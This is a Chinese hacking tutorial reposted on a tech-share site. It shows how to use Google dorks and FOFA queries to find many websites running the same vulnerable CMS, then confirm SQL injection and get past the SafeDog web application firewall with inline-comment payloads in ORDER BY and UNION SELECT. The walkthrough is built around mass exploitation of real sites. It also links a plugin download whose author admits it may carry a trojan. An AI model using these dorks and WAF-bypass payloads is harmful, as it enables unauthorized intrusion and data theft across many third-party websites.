ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

通杀挖掘之bypass安全狗

2021-01-26 14:58:18  阅读:306  来源: 互联网

标签:谷歌 通杀 inurl 语法 xx bypass 挖掘 注入


更多黑客技能 公众号:暗网黑客

本篇分享大纲:

主流浏览器安装谷歌助手插件。

分享谷歌找通杀技巧。

Bypass最简单的技巧。

一、首先介绍一下今天的漏洞:

今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。

SQL注入的原理必须要熟记于心:

用户能够控制输入数据 。

能够将用户输入的数据拼接进去执行。

二、安装插件:

首先安装谷歌插件,该插件我会以附件的形式放在文章最下方(害怕有木马的,弟弟也没得办法)。

Firefox火狐浏览器可能暂时不支持,也或许弟弟不知道,如果有可以用的大佬麻烦告诉弟弟。

360极速浏览器:
第一步:
图片

第二步:
图片

由于这个步骤没办法截图,我也懒得做GIF动图了。

大家能理解就自己操作,不行的话就加我QQ(914659453)

Google Chrome谷歌浏览器:

第一步:

在这里插入图片描述

第二步:在这里插入图片描述

由于这个步骤没办法截图,我也懒得做GIF动图了。大家能理解就自己操作,不行的话就加我QQ。

三:谷歌语法:

科普一下谷歌语法,虽然网上一大堆谷歌语法的教程。但是我立志写一篇最详细的。

这里是本次用到的:

site:指定域名,例:site:edu.cn 列出所有域名带有edu.cn的网站
inurl:指定url/目录/脚本语言,例:inurl:login.php 列出所有url中带有login.php的网站
intitle:指定网站标题,title部分,例:intitle:后台管理 列出标题为后台管理的网站
link:搜索链接到所输入URL的页面,该操作符不需要关键字,不能与其他操作符及关键字混用
intext:把网页中的正文内容中的某个字符做为搜索条件(但是只能搜索冒号后接的一个关键字)
双引号":强制搜索被双引号引用的内容

谷歌语法参考链接:
https://blog.csdn.net/u013589137/article/details/82758762

http://blog.sina.com.cn/s/blog_b4cbba7e0102x567.html

更多语法就不在这里讲解了,大家有兴趣可以继续去寻找。

四:准备就绪,战斗开启:

事先声明,本篇文章所涉及到的漏洞均已提交SRC平台。

希望小伙伴们可以发挥自己的思路,本文章只是给你们提供思路,具体情况自己发挥。

之前我用谷歌语法找注入,找到了很多。

然后偶尔一次发现存在注入漏洞的网站下方都会有一个技术支持,然后通过技术支持找到了很多一样的网站,判断为CMS,这就成就了所谓的通杀。

谷歌语法:`site:cn inurl:php?id=1 intitle:公司`

图片

通过这种方法会找到很多存在注入漏洞的网站(这里我觉得没必要进行打码,因为毕竟很多人都可以找到)

当然语法不是固定的,inurl可以指定别的注入关键字,这些还是需要大家自己去收集了。

这里找到一个:http://www.xxxxxxxx.cn/m/brand_list.php?id=3 测试存在注入,看着像CMS。

别问我为什么,因为我之前遇到过这种的。

返回首页看一下技术支持。
图片

点开网站建设,发现是xx网络。

这里有两个思路:

1. 进入xx网络的官网,查看网站案例(如果没有,看下一个)

2. 搜索引擎搜索关键字

第一个思路:
进入xx网络的官网,查看网站案例。

图片

这里虽然有案例作品,但是并没有写案例官网,所以略过。

第二个思路:
FOFA语法:

"xx网络" && country="CN"

图片

图片

图片

图片

大概出现这三种,确认是一个cms,但是FOFA只搜索到了一点站,案例不够怎么办?

搜索引擎这么多,干嘛非得他一家。

谷歌语法:

inurl:php  "济南xx网络"

在这里插入图片描述

这些案例肯定够了。

说实话,这个案例是我在写这边文章的时候找到了。。。

还有一点就是最简单找通杀的谷歌语法:

inurl:注入关键字 "技术支持:"

五:Bypass的案例:

这些案例是我之前找的注入点,过了几个月发现有技术支持,然后url基本一样,就发现的通杀。
这里先说一下payload:

/*!60000asd*/            WAF过滤哪些关键词就写在哪些中间,例如:order/*!60000sad*/by 1 或 系统函数:user/**/() 或 database/**/(),等

这里再解释一下Payload:

/*!*/   属于内联注释
asd     属于填充代码,必须有,可以随便输
60000   属于数据库版本号,为5位数,可换成其他5位数号码(只要能过狗)

安全狗:

谷歌语法:

inurl:about.php?id=1 "xx建站"

图片

找到很多同一CMS的站点,开始注入。

图片

进去以后正常页面。

添加单引号:

图片

and 1=1                 拦截
and -1=-1                 不拦截
and 1=2                        拦截
and -1=-2                不拦截

报错存在注入,既然确定存在注入,就直接order by。

图片

存在WAF,安全狗,利用上面我提到的语句来绕过。

order/*!60000asd*/by 字段数 limit 1,1

图片

成功绕过。

下面联合查询,union select。

图片

正常写联合查询被拦截。

还是用上面提到的Payload来绕过。

union/*!60000asd*/select 1,2,3,4 limit 1,1

成功绕过,系统函数也是同样的道理绕过。

由于时间关系,没时间写那么多,请大家给小弟一些时间。咱们下次再会!

谷歌访问助手已经放在网盘了,自取

链接:https://pan.baidu.com/s/1ZVs5SXyPRwR4g-vcEnXjVQ
提取码:zkaq

黑客渗透视频教程,扫码免费领在这里插入图片描述

标签:谷歌,通杀,inurl,语法,xx,bypass,挖掘,注入
来源: https://blog.csdn.net/hackzkaq/article/details/113179419

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有